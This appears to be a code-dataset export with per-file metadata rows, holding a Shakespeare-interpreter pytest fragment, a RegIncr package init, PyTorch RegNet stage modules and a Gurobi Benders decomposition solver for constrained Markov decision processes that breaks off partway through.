assert s.state.character_by_name("Macbeth").value == 0
captured = capsys.readouterr()
assert captured.out == ""
assert captured.err == ""
def test_conditional(capsys):
s = Shakespeare("Foo. Juliet, a test. Romeo, a test.")
s.run_event("[Enter Romeo and Juliet]")
assert s.state.character_by_name("Romeo").value == 0
s.state.global_boolean = False
s.run_sentence("If so, you are as good as a furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Romeo").value == 0
s.state.global_boolean = True
s.run_sentence("If not, you are as good as a furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Romeo").value == 0
s.state.global_boolean = True
s.run_sentence("If so, you are as good as a furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 2
assert s.state.character_by_name("Romeo").value == 2
s.state.global_boolean = False
s.run_sentence("If not, you are as good as a furry furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 4
captured = capsys.readouterr()
assert captured.out == ""
assert captured.err == ""
| 39.8625
| 80
| 0.688617
| 478
| 3,189
| 4.462343
| 0.138075
| 0.067511
| 0.140647
| 0.1594
| 0.882325
| 0.882325
| 0.873418
| 0.873418
| 0.873418
| 0.815284
| 0
| 0.00761
| 0.175917
| 3,189
| 79
| 81
| 40.367089
| 0.804033
| 0
| 0
| 0.714286
| 0
| 0
| 0.236751
| 0
| 0
| 0
| 0
| 0
| 0.492063
| 1
| 0.047619
| false
| 0
| 0.063492
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b8053b7866b0ba91c07c09cec97d4386ae195f33
| 276
|
py
|
Python
|
asic/designs/examples/regincr/__init__.py
|
cornell-brg/lizard
|
7f9a78a913e64b5cfdee3a26223539ad225bd6da
|
[
"BSD-3-Clause"
] | 50
|
2019-05-22T08:43:15.000Z
|
2022-03-21T23:58:50.000Z
|
asic/designs/examples/regincr/__init__.py
|
cornell-brg/lizard
|
7f9a78a913e64b5cfdee3a26223539ad225bd6da
|
[
"BSD-3-Clause"
] | 1
|
2019-07-27T18:51:52.000Z
|
2019-08-02T01:20:22.000Z
|
asic/designs/examples/regincr/__init__.py
|
cornell-brg/lizard
|
7f9a78a913e64b5cfdee3a26223539ad225bd6da
|
[
"BSD-3-Clause"
] | 11
|
2019-12-26T06:00:48.000Z
|
2022-03-27T02:29:35.000Z
|
#=========================================================================
# regincr
#=========================================================================
from RegIncr import RegIncr
from RegIncr2stage import RegIncr2stage
from RegIncrNstage import RegIncrNstage
| 30.666667
| 74
| 0.373188
| 13
| 276
| 7.923077
| 0.384615
| 0.213592
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007937
| 0.086957
| 276
| 8
| 75
| 34.5
| 0.400794
| 0.557971
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
b808a961964888bf746075ecaa2cb27491acc908
| 1,585
|
py
|
Python
|
pytorch/network/regnet/stage.py
|
psm9733/backbone
|
b891c859f667f52127af50cb60d08081f40032fe
|
[
"BSD-2-Clause"
] | 11
|
2021-08-15T20:00:35.000Z
|
2022-01-22T12:25:07.000Z
|
pytorch/network/regnet/stage.py
|
psm9733/backbone
|
b891c859f667f52127af50cb60d08081f40032fe
|
[
"BSD-2-Clause"
] | null | null | null |
pytorch/network/regnet/stage.py
|
psm9733/backbone
|
b891c859f667f52127af50cb60d08081f40032fe
|
[
"BSD-2-Clause"
] | null | null | null |
from network.regnet.blocks import XBlock, YBlock
import torch.nn as nn
class RegNetXStage(nn.Module):
    """One RegNet-X stage: a chain of XBlocks applied in sequence.

    The first block maps ``in_channels`` to ``block_width`` with
    stride 2; every later block keeps ``block_width`` with stride 1.
    """

    def __init__(self, activation, block_num, in_channels, block_width, bottleneck_ratio, groups=1, padding='same', dilation=1, bias=True):
        super().__init__()
        self.stage = nn.ModuleList([])
        for block_index in range(block_num):
            is_first = block_index == 0
            self.stage.append(XBlock(
                activation,
                in_channels if is_first else block_width,
                block_width,
                bottleneck_ratio,
                2 if is_first else 1,
                padding,
                groups,
                dilation,
                bias,
            ))

    def forward(self, input):
        # feed the input through every block in order
        output = input
        for block in self.stage:
            output = block(output)
        return output
class RegNetYStage(nn.Module):
    """One RegNet-Y stage: a chain of YBlocks applied in sequence.

    The first block maps ``in_channels`` to ``block_width`` with
    stride 2; every later block keeps ``block_width`` with stride 1.
    """

    def __init__(self, activation, block_num, in_channels, block_width, bottleneck_ratio, groups=1, padding='same', dilation=1, bias=True):
        super().__init__()
        self.stage = nn.ModuleList([])
        for block_index in range(block_num):
            is_first = block_index == 0
            self.stage.append(YBlock(
                activation,
                in_channels if is_first else block_width,
                block_width,
                bottleneck_ratio,
                2 if is_first else 1,
                padding,
                groups,
                dilation,
                bias,
            ))

    def forward(self, input):
        # feed the input through every block in order
        output = input
        for block in self.stage:
            output = block(output)
        return output
| 44.027778
| 140
| 0.633438
| 190
| 1,585
| 5.084211
| 0.247368
| 0.082816
| 0.124224
| 0.15528
| 0.904762
| 0.879917
| 0.879917
| 0.879917
| 0.879917
| 0.879917
| 0
| 0.010274
| 0.263091
| 1,585
| 35
| 141
| 45.285714
| 0.816781
| 0
| 0
| 0.733333
| 0
| 0
| 0.005165
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.066667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62aea76f51d6773cd1f389a27316954edf4a10d8
| 43,336
|
py
|
Python
|
scripts/constrained_MDP/MDP_Benders.py
|
ILABUTK/Benders_MDP_Dataset
|
ef3266877852a67fccbbce8a5c7c47163a740836
|
[
"MIT"
] | null | null | null |
scripts/constrained_MDP/MDP_Benders.py
|
ILABUTK/Benders_MDP_Dataset
|
ef3266877852a67fccbbce8a5c7c47163a740836
|
[
"MIT"
] | null | null | null |
scripts/constrained_MDP/MDP_Benders.py
|
ILABUTK/Benders_MDP_Dataset
|
ef3266877852a67fccbbce8a5c7c47163a740836
|
[
"MIT"
] | null | null | null |
"""
The Benders decomposition algorithm for MDP
"""
# import
import time
import logging
import numpy as np
import gurobipy as grb
class MDP_Benders:
    """
    Benders Decomposition of Markov Decision Processes.

    The master problem (MP) holds one value variable "theta_{s}" per
    state; each state has a cached dual subproblem over a randomized
    policy (variables "y_{a}") whose solutions generate optimality
    cuts for the master.
    """

    def __init__(
        self, name, MP, states, actions, trans_mat, reward_mat, gamma
    ):
        """
        `name`: str, base name used for log/solution files.
        `MP`: Gurobi master problem; must contain variables "theta_{s}".
        `states`, `actions`: sequences of state / action labels.
        `trans_mat`: trans_mat[a][s, s_new], transition probabilities.
        `reward_mat`: reward_mat[s, a], immediate rewards.
        `gamma`: discount factor.
        Note that in this CLASS, s and a are indices.
        """
        super().__init__()
        self.start_time = time.time()
        self.final_time = "nan"
        self.name = name
        self.MP = MP
        # map integer indices to the caller's labels
        self.state_dict = {
            s: states[s] for s in range(len(states))
        }
        self.action_dict = {
            a: actions[a] for a in range(len(actions))
        }
        self.trans_mat = trans_mat
        self.reward_mat = reward_mat
        self.gamma = gamma
        self.var_theta = {
            s: self.MP.getVarByName("theta_{}".format(s))
            for s in self.state_dict.keys()
        }
        self.var_vu = {}
        # ------------------------------------------------------
        # constructing all subproblems first; their objectives are
        # overwritten every iteration, so any placeholder theta works
        self.subproblems, self.y_val = {}, {}
        for s in self.state_dict.keys():
            self.subproblems[s] = self.__build_MDP_dual(s, theta_val={
                s: -1e10
                for s in self.state_dict.keys()
            })
        # ------------------------------------------------------
        self.log = False

    def __build_MDP_dual(self, s, theta_val):
        """
        Build the dual of the MDP for a single state.
        `s`: key of current state
        `theta_val`: dict, current master estimates of the state values.
        Returns a Gurobi model maximizing the one-step value over the
        simplex of action probabilities y_a.
        """
        # Gurobi model
        model = grb.Model()
        model.setParam("OutputFlag", False)
        # model.setParam("IntFeasTol", 1e-9)
        # the model pays the highest attention to numeric coherency.
        model.setParam("NumericFocus", 3)
        # disable dual reductions so INFEASIBLE / UNBOUNDED are reported
        # unambiguously instead of INF_OR_UNBD
        model.setParam("DualReductions", 0)
        # ----------------------- Variables -------------------------
        # policy, pr
        var_y = {}
        for a in self.action_dict.keys():
            var_y[a] = model.addVar(
                lb=0, ub=grb.GRB.INFINITY,
                vtype=grb.GRB.CONTINUOUS,
                name="y_{}".format(a)
            )
        model.update()
        # objective: sum_a y_a * (r(s,a) + gamma * sum_s' P_a(s,s') * theta_s')
        objective = grb.quicksum([
            grb.quicksum([
                self.reward_mat[s, a],
                grb.quicksum([
                    self.gamma * self.trans_mat[a][
                        s, s_new
                    ] * theta_val[s_new]
                    for s_new in self.state_dict.keys()
                ])
            ]) * var_y[a]
            for a in self.action_dict.keys()
        ])
        model.setObjective(objective, grb.GRB.MAXIMIZE)
        # ---------------------- Constraints ------------------------
        # the only constraint: y is a probability distribution
        model.addLConstr(
            lhs=grb.quicksum([
                var_y[a]
                for a in self.action_dict.keys()
            ]),
            sense=grb.GRB.EQUAL,
            rhs=1
        )
        model.update()
        return model

    def __modify_MDP_dual(self, s, theta_val):
        """
        Refresh the objective of the cached dual subproblem of state `s`
        with the latest master values (cheaper than rebuilding).
        `s`: key of current state
        `theta_val`: dict of current "theta_{s}" values from the master.
        """
        # find variables and modify objective coefficients in place
        for a in self.action_dict.keys():
            self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
                "Obj", np.sum([
                    self.reward_mat[s, a],
                    np.sum([
                        self.gamma * self.trans_mat[a][
                            s, s_new
                        ] * theta_val[s_new]
                        for s_new in self.state_dict.keys()
                    ])
                ])
            )
        self.subproblems[s].update()
        return

    def MDP_decomposition(self, sol_dir='None', write_log=False):
        """
        MDP Benders decomposition.
        `sol_dir`: str, directory to output solution, do not include file name.
        `write_log`: bool, write solving data to log, default False.
        Returns (objective, gap, run_time, solve_time, policy).
        """
        self.log = write_log
        if self.log:
            # NOTE: basicConfig is a no-op if the root logger was already
            # configured elsewhere in the process.
            logging.basicConfig(
                filename='{}.log'.format(self.name), filemode='w+',
                format='%(levelname)s - %(message)s', level=logging.INFO
            )
        # solving time of all models
        solve_time = 0
        # total time of the algorithm
        run_time = time.time()
        # start iteration
        iteration = 0
        while True:
            # solving first stage
            temp_time = time.time()
            self.MP.optimize()
            solve_time = solve_time + (time.time() - temp_time)
            # log
            if self.log:
                logging.info("=========================")
                logging.info("Iteration: {}".format(iteration))
            # check first stage feasibility
            # (fixed) compare against the INFEASIBLE status code; the
            # original compared against grb.GRB.INFINITY, a float value
            # constant (1e100) that can never equal a status code, so
            # infeasibility was never detected here.
            if self.MP.status == grb.GRB.INFEASIBLE:
                raise ValueError("First stage infeasible!")
            elif self.MP.status == grb.GRB.OPTIMAL:
                # register first stage variables
                # theta
                theta_val = {
                    s: self.MP.getVarByName(
                        "theta_{}".format(s)
                    ).X
                    for s in self.state_dict.keys()
                }
                # log
                if self.log:
                    logging.info("MP Objective: {}".format(self.MP.ObjVal))
                    logging.info("theta: {}".format(theta_val))
            else:
                raise ValueError(
                    "First stage optimality code {}.".format(self.MP.status)
                )
            # going through each scenario
            value = {}
            optimal = True
            epsilon = 1e-5
            for s in self.state_dict.keys():
                # modify second stage dual
                self.__modify_MDP_dual(s, theta_val)
                # solve
                temp_time = time.time()
                self.subproblems[s].optimize()
                solve_time = solve_time + (time.time() - temp_time)
                # check status
                if self.subproblems[s].status == grb.GRB.UNBOUNDED:
                    # feasibility cut?
                    # NOTE(review): an unbounded dual corresponds to an
                    # infeasible primal, so the status/message crossover
                    # here and below may be intentional -- confirm.
                    raise ValueError("Second stage {} infeasible!".format(s))
                elif self.subproblems[s].status == grb.GRB.INFEASIBLE:
                    raise ValueError("Second stage {} unbounded!".format(s))
                elif self.subproblems[s].status == grb.GRB.OPTIMAL:
                    # register solution
                    for a in self.action_dict.keys():
                        self.y_val[s, a] = self.subproblems[s].getVarByName(
                            "y_{}".format(a)
                        ).X
                    # log
                    if self.log:
                        logging.info("-------------------------")
                        logging.info(
                            " State: {}".format(self.state_dict[s])
                        )
                        logging.info(" Objective: {}".format(
                            self.subproblems[s].ObjVal
                        ))
                # e: expected immediate reward under the new policy
                e = np.dot([
                    self.y_val[s, a]
                    for a in self.action_dict.keys()
                ], [
                    self.reward_mat[s, a]
                    for a in self.action_dict.keys()
                ]
                )
                # coeff: cut coefficient of each theta_{s_new}
                coeff = {}
                for s_new in self.state_dict.keys():
                    coeff[s_new] = (-1) * self.gamma * np.sum([
                        self.y_val[s, a] * self.trans_mat[a][s, s_new]
                        for a in self.action_dict.keys()
                    ])
                # E
                E = np.sum([
                    coeff[s_new] * theta_val[s_new]
                    for s_new in self.state_dict.keys()
                ])
                value[s] = e - E
                # condition
                if self.log:
                    logging.info("Optimality condition:")
                    logging.info(
                        " State {}, theta = {}, value = {}".format(
                            self.state_dict[s],
                            self.var_theta[s].X, value[s]
                        )
                    )
                if any([
                    theta_val[s] >= value[s],
                    np.abs(theta_val[s] - value[s]) <= epsilon
                ]):
                    # optimal, continue
                    continue
                else:
                    optimal = False
                    # add optimality cut
                    self.MP.addLConstr(
                        lhs=grb.quicksum([self.var_theta[s]]),
                        sense=grb.GRB.GREATER_EQUAL,
                        rhs=e - grb.quicksum([
                            coeff[s_new] * self.var_theta[s_new]
                            for s_new in self.state_dict.keys()
                        ])
                    )
                    continue
            # after checking all states
            if optimal:
                self.final_time = time.time() - self.start_time
                # self.MP.write("model/{}-MPMDP.lp".format(self.name))
                if self.log:
                    logging.info("==============================")
                    logging.info("Final Objective: {}".format(self.MP.ObjVal))
                # stop loop
                break
            else:
                self.MP.update()
                # self.MP.write("model/{}-MPMDP.lp".format(self.name))
                iteration += 1
                continue
        # ------------------------- Output --------------------------
        run_time = time.time() - run_time
        # extract policy: most likely action per state
        policy = {}
        for s in self.state_dict.keys():
            policy[self.state_dict[s]] = self.action_dict[np.argmax([
                self.y_val[s, a]
                for a in self.action_dict.keys()
            ])]
        # gap
        gap = 0 if self.MP.IsMIP == 0 else self.MP.MIPGap
        # print solution to file
        if sol_dir == "None":
            pass
        else:
            file = open(
                "{}/{}-MPMDP.txt".format(sol_dir, self.name), mode="w+"
            )
            file.write("==============================\n")
            file.write(
                "Total algorithm run time: {} seconds;\n".format(run_time)
            )
            file.write(
                "Total model solving time: {} seconds;\n".format(solve_time)
            )
            # optimal value and gap
            file.write("==============================\n")
            file.write("Optimal Value:\n")
            file.write("Total value: {};\n".format(self.MP.ObjVal))
            file.write("Gap: {};\n".format(gap))
            for s in self.state_dict.keys():
                file.write("{}: {}\n".format(self.state_dict[s], value[s]))
            # optimal policy
            file.write("==============================\n")
            file.write("Optimal policy:\n")
            for state in self.state_dict.values():
                file.write("{}: {}\n".format(state, policy[state]))
            file.write("==============================\n")
            file.close()
        return self.MP.ObjVal, gap, run_time, solve_time, policy

    def __modify_MDP_dual_monotone(self, s, theta_val, best_action_ind):
        """
        Refresh the dual subproblem of state `s`, additionally forcing a
        monotone policy: actions below `best_action_ind` (the best action
        of the previous state) are disabled via a zero upper bound.
        `s`: key of current state
        `theta_val`: dict of current "theta_{s}" values from the master.
        `best_action_ind`: smallest admissible action index.
        """
        # find variables and modify bound + objective coefficient
        for a in self.action_dict.keys():
            if a < best_action_ind:
                self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
                    "UB", 0
                )
            else:
                self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
                    "UB", grb.GRB.INFINITY
                )
            self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
                "Obj", np.sum([
                    self.reward_mat[s, a],
                    np.sum([
                        self.gamma * self.trans_mat[a][
                            s, s_new
                        ] * theta_val[s_new]
                        for s_new in self.state_dict.keys()
                    ])
                ])
            )
        self.subproblems[s].update()
        return

    def MDP_decomposition_monotone(self, sol_dir='None', write_log=False):
        """
        MDP Benders decomposition with monotone policy.
        `sol_dir`: str, directory to output solution, do not include file name.
        `write_log`: bool, write solving data to log, default False.
        Returns (objective, gap, run_time, solve_time, policy).
        """
        self.log = write_log
        if self.log:
            logging.basicConfig(
                filename='{}.log'.format(self.name), filemode='w+',
                format='%(levelname)s - %(message)s', level=logging.INFO
            )
        # solving time of all models
        solve_time = 0
        # total time of the algorithm
        run_time = time.time()
        # start iteration
        iteration = 0
        while True:
            # solving first stage
            temp_time = time.time()
            self.MP.optimize()
            solve_time = solve_time + (time.time() - temp_time)
            # log
            if self.log:
                logging.info("=========================")
                logging.info("Iteration: {}".format(iteration))
            # check first stage feasibility
            # (fixed) INFEASIBLE status code, not the GRB.INFINITY value
            if self.MP.status == grb.GRB.INFEASIBLE:
                raise ValueError("First stage infeasible!")
            elif self.MP.status == grb.GRB.OPTIMAL:
                # register first stage variables
                # theta
                theta_val = {
                    s: self.MP.getVarByName(
                        "theta_{}".format(s)
                    ).X
                    for s in self.state_dict.keys()
                }
                # log
                if self.log:
                    logging.info("MP Objective: {}".format(self.MP.ObjVal))
                    logging.info("theta: {}".format(theta_val))
            else:
                raise ValueError(
                    "First stage optimality code {}.".format(self.MP.status)
                )
            # going through each scenario
            value = {}
            optimal = True
            epsilon = 1e-5
            # monotone: states are visited in index order and each state
            # may not pick an action below the previous state's best
            best_action_ind = 0
            for s in self.state_dict.keys():
                # modify second stage dual
                self.__modify_MDP_dual_monotone(s, theta_val, best_action_ind)
                # solve
                temp_time = time.time()
                self.subproblems[s].optimize()
                solve_time = solve_time + (time.time() - temp_time)
                # check status
                if self.subproblems[s].status == grb.GRB.UNBOUNDED:
                    # feasibility cut?
                    # NOTE(review): see MDP_decomposition on the
                    # status/message crossover.
                    raise ValueError("Second stage {} infeasible!".format(s))
                elif self.subproblems[s].status == grb.GRB.INFEASIBLE:
                    raise ValueError("Second stage {} unbounded!".format(s))
                elif self.subproblems[s].status == grb.GRB.OPTIMAL:
                    # register solution
                    for a in self.action_dict.keys():
                        self.y_val[s, a] = self.subproblems[s].getVarByName(
                            "y_{}".format(a)
                        ).X
                    best_action_ind = np.argmax([
                        self.y_val[s, a] for a in self.action_dict.keys()
                    ])
                    # log
                    if self.log:
                        logging.info("-------------------------")
                        logging.info(
                            " State: {}".format(self.state_dict[s])
                        )
                        logging.info(" Objective: {}".format(
                            self.subproblems[s].ObjVal
                        ))
                # e: expected immediate reward under the new policy
                e = np.dot([
                    self.y_val[s, a]
                    for a in self.action_dict.keys()
                ], [
                    self.reward_mat[s, a]
                    for a in self.action_dict.keys()
                ]
                )
                # coeff: cut coefficient of each theta_{s_new}
                coeff = {}
                for s_new in self.state_dict.keys():
                    coeff[s_new] = (-1) * self.gamma * np.sum([
                        self.y_val[s, a] * self.trans_mat[a][s, s_new]
                        for a in self.action_dict.keys()
                    ])
                # E
                E = np.sum([
                    coeff[s_new] * theta_val[s_new]
                    for s_new in self.state_dict.keys()
                ])
                value[s] = e - E
                # condition
                if self.log:
                    logging.info("Optimality condition:")
                    logging.info(
                        " State {}, theta = {}, value = {}".format(
                            self.state_dict[s],
                            self.var_theta[s].X, value[s]
                        )
                    )
                if any([
                    theta_val[s] >= value[s],
                    np.abs(theta_val[s] - value[s]) <= epsilon
                ]):
                    # optimal, continue
                    continue
                else:
                    optimal = False
                    # add optimality cut
                    self.MP.addLConstr(
                        lhs=grb.quicksum([self.var_theta[s]]),
                        sense=grb.GRB.GREATER_EQUAL,
                        rhs=e - grb.quicksum([
                            coeff[s_new] * self.var_theta[s_new]
                            for s_new in self.state_dict.keys()
                        ])
                    )
                    continue
            # after checking all states
            if optimal:
                self.final_time = time.time() - self.start_time
                # self.MP.write("model/{}-MPMDP.lp".format(self.name))
                if self.log:
                    logging.info("==============================")
                    logging.info("Final Objective: {}".format(self.MP.ObjVal))
                # stop loop
                break
            else:
                self.MP.update()
                # self.MP.write("model/{}-MPMDP.lp".format(self.name))
                iteration += 1
                continue
        # ------------------------- Output --------------------------
        run_time = time.time() - run_time
        # extract policy: most likely action per state
        policy = {}
        for s in self.state_dict.keys():
            policy[self.state_dict[s]] = self.action_dict[np.argmax([
                self.y_val[s, a]
                for a in self.action_dict.keys()
            ])]
        # gap
        gap = 0 if self.MP.IsMIP == 0 else self.MP.MIPGap
        # print solution to file
        if sol_dir == "None":
            pass
        else:
            file = open(
                "{}/{}-MPMDP_mono.txt".format(sol_dir, self.name), mode="w+"
            )
            file.write("==============================\n")
            file.write(
                "Total algorithm run time: {} seconds;\n".format(run_time)
            )
            file.write(
                "Total model solving time: {} seconds;\n".format(solve_time)
            )
            # optimal value and gap
            file.write("==============================\n")
            file.write("Optimal Value:\n")
            file.write("Total value: {};\n".format(self.MP.ObjVal))
            file.write("Gap: {};\n".format(gap))
            for s in self.state_dict.keys():
                file.write("{}: {}\n".format(self.state_dict[s], value[s]))
            # optimal policy
            file.write("==============================\n")
            file.write("Optimal policy:\n")
            for state in self.state_dict.values():
                file.write("{}: {}\n".format(state, policy[state]))
            file.write("==============================\n")
            file.close()
        return self.MP.ObjVal, gap, run_time, solve_time, policy
class Constrained_MDP_Benders:
    """
    Benders Decomposition of constrained Markov Decision Processes.

    Like MDP_Benders, but the master also carries multiplier variables
    "rho_{i}" for the side constraints (cost matrices `d`, budgets `D`),
    and the subproblem objectives price those constraints as well.
    """

    def __init__(
        self, name, MP, states, actions, trans_mat, reward_mat, gamma,
        d, D
    ):
        """
        `name`: str, base name used for log/solution files.
        `MP`: Gurobi master problem; must contain variables "theta_{s}"
            and "rho_{i}".
        `states`, `actions`: sequences of state / action labels.
        `trans_mat`: trans_mat[a][s, s_new], transition probabilities.
        `reward_mat`: reward_mat[s, a], immediate rewards.
        `gamma`: discount factor.
        `d`: constraint costs, d[i, s, a]; `D`: constraint budgets.
        Note that in this CLASS, s and a are indices.
        """
        super().__init__()
        self.start_time = time.time()
        self.final_time = "nan"
        self.name = name
        self.MP = MP
        # map integer indices to the caller's labels
        self.state_dict = {
            s: states[s] for s in range(len(states))
        }
        self.action_dict = {
            a: actions[a] for a in range(len(actions))
        }
        self.trans_mat = trans_mat
        self.reward_mat = reward_mat
        self.gamma = gamma
        self.d, self.D = d, D
        self.var_theta = {
            s: self.MP.getVarByName("theta_{}".format(s))
            for s in self.state_dict.keys()
        }
        self.var_rho = {
            i: self.MP.getVarByName("rho_{}".format(i))
            for i in range(len(self.D))
        }
        self.var_vu = {}
        # ------------------------------------------------------
        # constructing all subproblems first; objectives are rebuilt
        # every iteration, so placeholder theta/rho values suffice
        self.subproblems, self.y_val = {}, {}
        for s in self.state_dict.keys():
            self.subproblems[s] = self.__build_MDP_dual(s, theta_val={
                s: -1e10
                for s in self.state_dict.keys()
            }, rho_val={
                i: 0
                for i in range(len(self.D))
            })
        # ------------------------------------------------------
        self.log = False

    def __build_MDP_dual(self, s, theta_val, rho_val):
        """
        Build the dual of the constrained MDP for a single state.
        `s`: key of current state
        `theta_val`: dict of master state-value estimates.
        `rho_val`: dict of master constraint multipliers.
        """
        # Gurobi model
        model = grb.Model()
        model.setParam("OutputFlag", False)
        # model.setParam("IntFeasTol", 1e-9)
        # the model pays the highest attention to numeric coherency.
        model.setParam("NumericFocus", 3)
        # report INFEASIBLE / UNBOUNDED unambiguously
        model.setParam("DualReductions", 0)
        # ----------------------- Variables -------------------------
        # policy, pr
        var_y = {}
        for a in self.action_dict.keys():
            var_y[a] = model.addVar(
                lb=0, ub=grb.GRB.INFINITY,
                vtype=grb.GRB.CONTINUOUS,
                name="y_{}".format(a)
            )
        model.update()
        # objective: reward + discounted future value - priced constraint cost
        objective = grb.quicksum([
            grb.quicksum([
                self.reward_mat[s, a],
                grb.quicksum([
                    self.gamma * self.trans_mat[a][
                        s, s_new
                    ] * theta_val[s_new]
                    for s_new in self.state_dict.keys()
                ]),
                (-1) * grb.quicksum([
                    self.d[i, s, a] * rho_val[i]
                    for i in range(len(self.D))
                ])
            ]) * var_y[a]
            for a in self.action_dict.keys()
        ])
        model.setObjective(objective, grb.GRB.MAXIMIZE)
        # ---------------------- Constraints ------------------------
        # the only constraint: y is a probability distribution
        model.addLConstr(
            lhs=grb.quicksum([
                var_y[a]
                for a in self.action_dict.keys()
            ]),
            sense=grb.GRB.EQUAL,
            rhs=1
        )
        model.update()
        return model

    def __modify_MDP_dual(self, s, theta_val, rho_val):
        """
        Refresh the objective of the cached dual subproblem of state `s`
        with the latest master values (theta and rho).
        """
        # find variables and modify objective coefficients in place
        for a in self.action_dict.keys():
            self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
                "Obj", np.sum([
                    self.reward_mat[s, a],
                    np.sum([
                        self.gamma * self.trans_mat[a][
                            s, s_new
                        ] * theta_val[s_new]
                        for s_new in self.state_dict.keys()
                    ]),
                    (-1) * np.sum([
                        self.d[i, s, a] * rho_val[i]
                        for i in range(len(self.D))
                    ])
                ])
            )
        self.subproblems[s].update()
        return

    def MDP_decomposition(self, sol_dir='None', write_log=False):
        """
        Constrained MDP Benders decomposition.
        `sol_dir`: str, directory to output solution, do not include file name.
        `write_log`: bool, write solving data to log, default False.
        Returns (objective, gap, run_time, solve_time, policy).
        """
        self.log = write_log
        if self.log:
            logging.basicConfig(
                filename='{}.log'.format(self.name), filemode='w+',
                format='%(levelname)s - %(message)s', level=logging.INFO
            )
        # solving time of all models
        solve_time = 0
        # total time of the algorithm
        run_time = time.time()
        # start iteration
        iteration = 0
        while True:
            # solving first stage
            temp_time = time.time()
            self.MP.optimize()
            solve_time = solve_time + (time.time() - temp_time)
            # log
            if self.log:
                logging.info("=========================")
                logging.info("Iteration: {}".format(iteration))
            # check first stage feasibility
            # (fixed) INFEASIBLE status code, not the GRB.INFINITY value
            # constant, which can never equal a status code
            if self.MP.status == grb.GRB.INFEASIBLE:
                raise ValueError("First stage infeasible!")
            elif self.MP.status == grb.GRB.OPTIMAL:
                # register first stage variables
                # theta
                theta_val = {
                    s: self.MP.getVarByName(
                        "theta_{}".format(s)
                    ).X
                    for s in self.state_dict.keys()
                }
                # rho
                rho_val = {
                    i: self.MP.getVarByName(
                        "rho_{}".format(i)
                    ).X
                    for i in range(len(self.D))
                }
                # log
                if self.log:
                    logging.info("MP Objective: {}".format(self.MP.ObjVal))
                    logging.info("theta: {}".format(theta_val))
                    logging.info("rho: {}".format(rho_val))
            else:
                raise ValueError(
                    "First stage optimality code {}.".format(self.MP.status)
                )
            # going through each scenario
            value = {}
            optimal = True
            epsilon = 1e-5
            for s in self.state_dict.keys():
                # modify second stage dual
                self.__modify_MDP_dual(s, theta_val, rho_val)
                # solve
                temp_time = time.time()
                self.subproblems[s].optimize()
                solve_time = solve_time + (time.time() - temp_time)
                # check status
                if self.subproblems[s].status == grb.GRB.UNBOUNDED:
                    # feasibility cut?
                    # NOTE(review): an unbounded dual corresponds to an
                    # infeasible primal, so the status/message crossover
                    # here and below may be intentional -- confirm.
                    raise ValueError("Second stage {} infeasible!".format(s))
                elif self.subproblems[s].status == grb.GRB.INFEASIBLE:
                    raise ValueError("Second stage {} unbounded!".format(s))
                elif self.subproblems[s].status == grb.GRB.OPTIMAL:
                    # register solution
                    for a in self.action_dict.keys():
                        self.y_val[s, a] = self.subproblems[s].getVarByName(
                            "y_{}".format(a)
                        ).X
                    # log
                    if self.log:
                        logging.info("-------------------------")
                        logging.info(
                            " State: {}".format(self.state_dict[s])
                        )
                        logging.info(" Objective: {}".format(
                            self.subproblems[s].ObjVal
                        ))
                # e: expected immediate reward under the new policy
                e = np.dot([
                    self.y_val[s, a]
                    for a in self.action_dict.keys()
                ], [
                    self.reward_mat[s, a]
                    for a in self.action_dict.keys()
                ]
                )
                # coeff: cut coefficients for theta; coeff_d: for rho
                coeff, coeff_d = {}, {}
                for s_new in self.state_dict.keys():
                    coeff[s_new] = (-1) * self.gamma * np.sum([
                        self.y_val[s, a] * self.trans_mat[a][s, s_new]
                        for a in self.action_dict.keys()
                    ])
                for i in range(len(self.D)):
                    coeff_d[i] = np.sum([
                        self.y_val[s, a] * self.d[i, s, a]
                        for a in self.action_dict.keys()
                    ])
                # E
                E = np.sum([
                    np.sum([
                        coeff[s_new] * theta_val[s_new]
                        for s_new in self.state_dict.keys()
                    ]),
                    np.sum([
                        coeff_d[i] * rho_val[i]
                        for i in range(len(self.D))
                    ])
                ])
                value[s] = e - E
                # condition
                if self.log:
                    logging.info("Optimality condition:")
                    logging.info(
                        " State {}, theta = {}, value = {}".format(
                            self.state_dict[s],
                            self.var_theta[s].X, value[s]
                        )
                    )
                if any([
                    theta_val[s] >= value[s],
                    np.abs(theta_val[s] - value[s]) <= epsilon
                ]):
                    # optimal, continue
                    continue
                else:
                    optimal = False
                    # add optimality cut (theta and rho terms)
                    self.MP.addLConstr(
                        lhs=grb.quicksum([self.var_theta[s]]),
                        sense=grb.GRB.GREATER_EQUAL,
                        rhs=e - grb.quicksum([
                            grb.quicksum([
                                coeff[s_new] * self.var_theta[s_new]
